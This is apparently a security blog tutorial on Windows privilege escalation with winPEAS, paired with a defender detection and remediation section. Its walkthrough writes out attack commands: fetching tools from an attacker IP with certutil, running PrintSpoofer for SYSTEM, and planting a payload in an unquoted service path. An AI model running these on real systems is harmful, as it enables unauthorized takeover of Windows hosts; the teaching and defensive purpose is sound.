Practical Windows Enumeration with winPEAS

Windows Privesc
2026.03.29
Time it takes to read this article 5 minutes.

Introduction / Overview

Local privilege escalation on Windows almost always begins with enumeration. Before you reach for an exploit, you need a clear map of misconfigurations: weak service permissions, unquoted service paths, abusable autoruns, stored credentials, and missing patches. winPEAS (Windows Privilege Escalation Awesome Scripts) is the de-facto enumeration tool for this phase, part of the PEASS-ng project.

In this article you'll learn how to run winPEASx64.exe on a target, interpret its color-coded output, and focus on three high-value findings: privilege checks, unquoted service paths, and autorun scans. Equally important, the Blue Team section shows how defenders detect and shut down these exact paths.

Ethical & Legal Disclaimer: This material is for education and authorized testing only. Run these techniques exclusively on systems you own or have explicit written permission to assess (e.g., an OSCP lab, an HTB/THM box, or a scoped engagement). Unauthorized access to computer systems is a crime in virtually every jurisdiction.

How It Works / Background

winPEAS is not an exploit. It is a high-speed read-only collector that queries the Windows API, the registry, WMI, and the filesystem, then ranks findings by exploitability. The output is color-coded:

  • Red/Yellow highlight — almost certainly exploitable (e.g., a writable service binary).
  • Green — currently configured / baseline information.
  • Blue — informational user/group context.

Three classes of findings deserve special attention:

  1. Privilege check — Enumerates the current token's privileges via GetTokenInformation. Privileges like SeImpersonatePrivilege, SeAssignPrimaryTokenPrivilege, or SeBackupPrivilege are directly abusable (the "Potato" family of attacks abuses impersonation).
  2. Unquoted service path — Windows services whose ImagePath contains spaces but no quotes. The Service Control Manager parses the path left-to-right, so C:\Program Files\My App\svc.exe may resolve C:\Program.exe first if an attacker can write there.
  3. Autorun scan — Registry Run/RunOnce keys, Startup folders, and scheduled tasks pointing at binaries an unprivileged user can overwrite.

Prerequisites / Lab Setup

  • A foothold with a low-privilege shell on a Windows target (Windows 10/11 or Server 2016+).
  • The winPEASx64.exe binary (use x64 on 64-bit hosts; an obfuscated .bat variant exists for AV-heavy environments).
  • A way to transfer the binary: an HTTP listener on the attacker host plus certutil or PowerShell on the target.

Grab the latest release:

# On the attacker machine
wget https://github.com/peass-ng/PEASS-ng/releases/latest/download/winPEASx64.exe
python3 -m http.server 8000

Transfer to the target:

# On the target (low-priv shell)
certutil.exe -urlcache -split -f "http://10.10.14.5:8000/winPEASx64.exe" C:\Windows\Temp\wp.exe
# or, in-memory friendly:
iwr http://10.10.14.5:8000/winPEASx64.exe -OutFile C:\Windows\Temp\wp.exe

Attack Walkthrough / PoC

1. Run the full scan

C:\Windows\Temp\wp.exe > C:\Windows\Temp\wp.txt

For a focused, faster run you can pass categories. Useful flags include systeminfo, userinfo, servicesinfo, and quiet (suppress the banner). Use log to write to a file directly, and cmd to also run extra commands:

# Only service info, quiet banner, redirect color codes off
C:\Windows\Temp\wp.exe quiet servicesinfo

2. Privilege check

Look for the Current Token privileges block. A typical exploitable result on a service account:

SeImpersonatePrivilege         Enabled
SeAssignPrimaryTokenPrivilege  Enabled

You can confirm the same data natively:

whoami /priv

If SeImpersonatePrivilege is Enabled, the host is a candidate for a Potato-style attack (PrintSpoofer, GodPotato, or RoguePotato), which coerce a privileged process into authenticating to a named pipe you control and let you impersonate NT AUTHORITY\SYSTEM:

.\PrintSpoofer64.exe -i -c cmd.exe

3. Unquoted service path

winPEAS flags these under the services section with a yellow highlight. Verify manually:

wmic service get name,displayname,pathname,startmode | findstr /i "auto" | findstr /i /v "c:\windows\\" | findstr /i /v """

Suppose winPEAS reports:

"VulnService" -> C:\Program Files\Vuln Service\service.exe (Unquoted and Space detected)

If you have write permission to C:\ or C:\Program Files\, drop a malicious Program.exe or Vuln.exe. Always confirm the write permission first:

icacls "C:\Program Files\Vuln Service"

If a writable directory sits earlier in the path, place your payload and restart the service (or wait for a reboot):

copy payload.exe "C:\Program Files\Vuln.exe"
sc stop VulnService & sc start VulnService

The service runs as LocalSystem, so your payload inherits SYSTEM. Note that the unquoted path alone is not enough — the writable directory in the path is the actual vulnerability.

4. Autorun scan

winPEAS enumerates autoruns from the registry and Startup folders. Cross-check the Run key and its permissions:

reg query "HKLM\Software\Microsoft\Windows\CurrentVersion\Run"
icacls "C:\Program Files\Autorun App\autorun.exe"

If an autorun binary or its registry value is writable by your user and the next logon is performed by an admin, replacing the binary yields code execution in that admin's context. This is closely related to the broader Windows service exploitation patterns you may already know.

Attack Flow Diagram

Practical Windows Enumeration with winPEAS diagram 1

Diagram: a foothold leads to winPEAS enumeration, whose highlighted findings branch into impersonation, unquoted-path, or autorun abuse — all converging on SYSTEM.

Detection & Defense (Blue Team)

Enumeration tools are noisy. Defenders have multiple layers to catch and prevent each step.

Detect the enumeration itself. winPEAS triggers hundreds of registry, WMI, and service queries in seconds. EDR products commonly flag winPEASx64.exe by hash and behavior. Map activity to MITRE ATT&CK techniques T1057 (Process Discovery), T1082 (System Information Discovery), and T1518 (Software Discovery). Enable PowerShell Script Block Logging (Event ID 4104) and command-line process auditing (Event ID 4688) to capture certutil downloads and the binary launch.

Fix unquoted service paths (T1574.009). Audit all services and enclose paths in quotes:

Get-CimInstance Win32_Service |
  Where-Object { $_.PathName -notmatch '^"' -and $_.PathName -match ' ' -and $_.PathName -notmatch '^C:\\Windows' } |
  Select-Object Name, PathName

Remediate by quoting the ImagePath and removing write access from non-admins on every directory in the path (C:\, C:\Program Files\ should not be user-writable by default — verify nobody loosened them).

Neutralize impersonation abuse (T1134). SeImpersonatePrivilege is required by legitimate service accounts (IIS, SQL), so you can't simply remove it. Instead, keep hosts patched (RoguePotato/RPC coercion paths are mitigated on current builds), restrict which accounts run as service identities, and apply gMSA with least privilege. Monitor for named-pipe creation followed by token manipulation.

Lock down autoruns (T1547.001). Baseline HKLM\...\CurrentVersion\Run, RunOnce, and Startup folders, then alert on changes. Use icacls to ensure autorun targets are not writable by standard users, and apply AppLocker or WDAC so that only signed, approved binaries execute regardless of where they were dropped.

Reduce overall attack surface. Enforce least privilege, enable Credential Guard to limit harvestable secrets (also covered in Credential Dumping with Mimikatz), and run regular configuration audits so winPEAS finds nothing to highlight.

Conclusion

winPEAS turns the tedious, error-prone task of Windows enumeration into a fast, color-coded report. For privilege escalation, the three findings that most often lead to SYSTEM are abusable token privileges, unquoted service paths with a writable directory, and writable autorun binaries. The same output is a gift to defenders: every highlighted line is a concrete remediation item. Run the tool, but more importantly, run it against your own estate first and close the gaps before an adversary enumerates them for you.

References

Comments

Copied title and URL